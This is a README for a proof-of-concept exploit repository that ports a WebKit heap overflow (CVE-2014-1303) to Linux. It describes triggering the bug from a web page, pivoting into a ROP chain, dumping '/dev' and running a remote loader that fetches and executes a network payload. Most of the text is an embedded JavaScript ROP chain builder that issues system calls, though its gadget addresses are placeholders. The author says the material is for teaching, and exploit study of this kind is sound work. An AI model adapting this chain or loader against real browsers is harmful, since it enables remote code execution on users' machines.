
CVE-2014-1303 PoC for Linux

This repository is a proof of concept for CVE-2014-1303, a heap-based buffer overflow in WebKit, ported to Linux. It triggers the bug from a web page and pivots into a ROP chain that performs system calls and, in the full test, loads and runs a native payload.

NOTE: The original exploit was written for Mac OS X and the PS4 (PlayStation 4).

I've ported it and tested that it works on Ubuntu 14.04 with WebKitGTK 2.1.2.

Usage

First, start the simple web server shipped with the repository:

$ python server.py

Then launch the WebKitGTK test browser against it:

$ cd /path/to/webkitgtk2.1.2/
$ ./Programs/GtkLauncher http://localhost

The page offers several tests:

  • Crash ROP (jump to an invalid address such as 0xdeadbeefdeadbeef to confirm that the ROP chain is reached)
  • Get PID (print the current PID)
  • Code Execution (load and execute a payload fetched over the network)
  • File System Dump (dump the entries of "/dev")

Description

exploit.html ..... triggers the vulnerability and jumps into the ROP chain
scripts/roputil.js ..... utilities for building ROP chains
scripts/syscall.js ..... ROP chains that perform system calls
scripts/code.js ..... hard-coded remote loader
loader/ ..... simple remote loader (written in C)
loader/bin2js ..... converts a binary into JS variables (used by the loader)
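To make the "Crash ROP" and "Get PID" tests above and the roles of roputil.js / syscall.js concrete, here is an added example of a minimal 64-bit ROP chain builder. It is not code from this repository: the module base, every gadget offset, the `mov [rdi], rax ; ret` store gadget and the scratch buffer address are hypothetical placeholders (a real chain reads the base from a leaked pointer and takes offsets from the target WebKit build); only the x86-64 Linux syscall numbers are real. The chain is serialised as little-endian 32-bit word pairs, the form it takes when written into memory through a corrupted typed array.

```javascript
// Added example (not part of the repository): a roputil.js-style chain builder.
// All addresses below are HYPOTHETICAL. Only the syscall numbers are real.

const LIBBASE = 0x7f0000000000n;   // assumed module base; leaked at runtime in a real exploit
const GADGET = {                   // assumed gadget offsets, illustrative only
  pop_rdi:      0x1001n,  // pop rdi ; ret
  pop_rsi:      0x1003n,  // pop rsi ; ret
  pop_rdx:      0x1005n,  // pop rdx ; ret
  pop_rax:      0x1007n,  // pop rax ; ret
  syscall:      0x1009n,  // syscall ; ret
  mov_prdi_rax: 0x100bn,  // mov [rdi], rax ; ret   (stores a syscall result)
};
const SYS = { write: 1n, getpid: 39n };   // real x86-64 Linux syscall numbers
const MASK64 = (1n << 64n) - 1n;

class RopChain {
  constructor() { this.words = []; }        // 64-bit stack words as BigInt
  push(v) { this.words.push(BigInt(v) & MASK64); return this; }
  gadget(name) { return this.push(LIBBASE + GADGET[name]); }
  // "pop <reg> ; ret" consumes the next word, then ret lands on the following gadget.
  setReg(reg, value) { return this.gadget('pop_' + reg).push(value); }
  // Full syscall: load rdi/rsi/rdx with the arguments, rax with the number, then "syscall ; ret".
  syscall(nr, rdi = 0n, rsi = 0n, rdx = 0n) {
    return this.setReg('rdi', rdi).setReg('rsi', rsi).setReg('rdx', rdx)
               .setReg('rax', nr).gadget('syscall');
  }
  // Little-endian 32-bit pairs (low word first), ready to be written via a Uint32Array view.
  toUint32Array() {
    const out = new Uint32Array(this.words.length * 2);
    this.words.forEach((w, i) => {
      out[2 * i]     = Number(w & 0xffffffffn);
      out[2 * i + 1] = Number(w >> 32n);
    });
    return out;
  }
}

// "Crash ROP": the very first ret jumps to a recognisable bogus address,
// so a SIGSEGV at 0xdeadbeefdeadbeef proves the chain was reached.
function crashChain() {
  return new RopChain().push(0xdeadbeefdeadbeefn);
}

// "Get PID": getpid(), store rax into a scratch buffer, then write(1, scratch, 8)
// so the PID shows up on the launcher's stdout.
function getpidChain(scratchAddr) {
  return new RopChain()
    .syscall(SYS.getpid)
    .setReg('rdi', scratchAddr).gadget('mov_prdi_rax')
    .syscall(SYS.write, 1n, scratchAddr, 8n);
}

// Usage: a hypothetical scratch address inside sprayed heap memory.
const SCRATCH = 0x41414140n;
const chain = getpidChain(SCRATCH);
console.log(chain.words.length, 'stack words;', chain.toUint32Array().length, 'u32 entries');
```

In the repository the same idea is split in two: roputil.js plays the role of `RopChain` (pushing gadgets and immediates), and syscall.js holds canned sequences like `getpidChain`. Whatever the layout, every chain must start at the word the corrupted return address or vtable pointer lands on, and each gadget must end in `ret` so control falls through to the next word.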

Purpose

I created this WebKit PoC for teaching in my course.
I couldn't, of course, use an actual PS4 console in my lecture for legal reasons :(

Reference

CVE-2014-1303 Proof of Concept for PS4
(https://github.com/Fire30/PS4-2014-1303-POC)
Liang Chen, WebKit Everywhere: Secure or Not? (Black Hat Europe 2014)
(https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF)